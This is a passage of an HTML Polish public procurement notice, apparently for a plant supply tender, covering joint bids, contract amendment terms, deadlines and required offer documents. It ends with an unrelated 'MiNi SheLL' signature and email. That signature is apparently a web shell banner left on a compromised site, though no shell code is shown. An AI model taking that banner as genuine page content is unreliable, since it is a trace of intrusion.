wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>2. Żaden z Wykonawców wspólnie ubiegających się o zamówienie nie może podlegać wykluczeniu z postępowania na<br/>podstawie art. 108 ust. 1 Pzp.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>usługi, roboty budowlane do realizacji których te zdolności są wymagane zgodnie z opisem warunku w pkt. 10.2.4 SWZ.<br/>4. W tym przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z<br/>którego wynika, które dostawy wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi załącznik nr 7 do SWZ.<br/>5. Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa:<br/>- oświadczenie, na podstawie art. 125 ust. 1 Pzp, o którym mowa w pkt. 11.1.1, 11.2.1. SWZ. Oświadczenia te potwierdzają<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>- podmiotowe środki dowodowe potwierdzające brak podstaw do wykluczenia, o których mowa w pkt. 11.4 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zgodnie z postanowieniami art. 455 ust.1 ustawy Pzp Zamawiający przewiduje możliwość dokonania istotnych zmian<br/>postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, pod<br/>warunkiem podpisania aneksu zaakceptowanego przez obydwie Strony. W szczególności Zamawiający dopuszcza:<br/>1) aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazw firmy, zmianę adresu siedziby, zmianę formy<br/>prawnej Wykonawcy itp., Zmniejszenie zakresu (asortymentu lub ilości) dostarczanych roślin oraz związane z tym<br/>zmniejszenie wartości umowy,<br/>2) wystąpienia uzasadnionych zmian w zakresie sposobu wykonania i finansowania przedmiotu zamówienia<br/>proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego,<br/>3) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy<br/>którejkolwiek ze stron,<br/>4) zmiana terminu realizacji przedmiotu zamówienia wraz ze skutkami wprowadzenia takiej zmiany, przy czym zmiana<br/>spowodowana może być jedynie okolicznościami leżącymi wyłącznie po stronie Zamawiającego lub okolicznościami<br/>niezależnymi zarówno od Zamawiającego jak i od Wykonawcy<br/>5) zmiana sposobu wykonywania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany, przy czym zmiana<br/>spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy,<br/>6) dostosowanie umowy do zmian powszechnie obowiązujących przepisów prawa mających wpływ na realizację przedmiotu<br/>zamówienia,<br/>7) wprowadzenie podwykonawcy w sytuacji, gdy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy,<br/>konieczne będzie dla prawidłowego wykonania umowy posłużenie się przez Wykonawcę podwykonawcą, który będzie<br/>realizować część przedmiotu umowy,<br/>8) gdy zajdą inne okoliczności niezależne od Wykonawcy, których nie można było przewidzieć w dniu zawarcia umowy.<br/>2. Warunkiem dokonania zmiany do umowy jest:<br/>1) Strona występująca o zmianę postanowień umowy zobowiązana jest do udokumentowania zaistnienia okoliczności, na<br/>które powołuje się jako podstawę zmiany umowy,<br/>2) wniosek o zmianę postanowień umowy musi być wyrażony na piśmie,<br/>3) wniosek, o którym mowa w pkt 2 musi zawierać:<br/>a) opis propozycji zmiany,<br/>b) uzasadnienie zmiany,<br/>c) opis wpływu zmiany na warunki realizacji umowy.<br/>3. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym,<br/>czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od<br/>powzięcia wiadomości o powyższych okolicznościach. W takim wypadku Wykonawca może żądać jedynie wynagrodzenia<br/>należnego mu z tytułu wykonania części umowy, co zostanie potwierdzone protokołem sporządzonym przez przedstawicieli<br/>obu stron.<br/>4. Wszelkie zmiany niniejszej umowy wymagają formy pisemnego aneksu pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/998293</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-25 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Na ofertę składają się:<br/>1) formularz ofertowy sporządzony wg Załącznika nr 2 do SWZ – nie podlega uzupełnieniu,<br/>2) formularz cenowy sporządzony wg Załącznika nr 3,<br/>3) oświadczenie Wykonawcy na podstawie art. 125 ust. 1 ustawy Pzp, stanowiące wstępne potwierdzenie, że Wykonawca<br/>spełnia warunki udziału w postępowaniu – wg Załącznika nr 4 do SWZ,<br/>4) oświadczenie Wykonawcy na podstawie art. 125 ust. 1 ustawy Pzp, stanowiące wstępne potwierdzenie o braku podstaw<br/>do wykluczenia – wg Załącznika nr 4 do SWZ,<br/>5) /jeżeli dotyczy/ Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w<br/>imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów rejestrowych: KRS,<br/>CEDiG.<br/>6) /jeżeli dotyczy/ Podmiot udostępniający zasoby:<br/>1. zobowiązanie podmiotu udostępniającego zasoby - wg Załącznika nr 6 do SWZ<br/>2. pełnomocnictwo lub inny dokument potwierdzający umocowanie osoby działającej w imieniu podmiotu udostępniającego<br/>zasoby na zasadach określonych w art. 118 Pzp, jeżeli umocowanie do reprezentowania nie wynika z dokumentów<br/>rejestrowych: KRS, CEDiG.<br/>3. oświadczenie podmiotu udostępniającego zasoby na podstawie art. 125 ust. 1 i 5 ustawy Pzp, stanowiące wstępne<br/>potwierdzenie, że Wykonawca spełnia warunki udziału w postępowaniu – wg Załącznika nr 9 do SWZ.<br/>4. oświadczenie podmiotu udostępniającego zasoby na podstawie art. 125 ust. 1 i 5 ustawy Pzp, stanowiące wstępne<br/>potwierdzenie o braku podstaw do wykluczenia – wg Załącznika nr 9 do SWZ.<br/>7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (jeżeli dotyczy):<br/>1. pełnomocnictwo lub inny dokument, w którym Wykonawcy wspólnie ubiegający się o zamówienie ustanawiają<br/>pełnomocnika do reprezentowania wszystkich wykonawców w postępowaniu albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia (art. 58 ust. 2 Pzp);<br/>2. oświadczenie Wykonawców wspólnie ubiegających się o zamówienie, z którego wynika, które usługi wykonają<br/>poszczególni wykonawcy (art. 117 ust. 4 Pzp) – wg Załącznika nr 7 do SWZ<br/>3. dokumenty określone w pkt. 11.1.1 i 11.2.1 SWZ – złożone przez każdego z Wykonawców wspólnie ubiegających się o<br/>zamówienie;<br/>Wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na „Wykonawcę”, w miejscu np. „nazwa i adres<br/>Wykonawcy” należy wpisać dane dotyczące podmiotu wspólnego, a nie pełnomocnika (lidera).

Creat By MiNi SheLL
Email: jattceo@gmail.com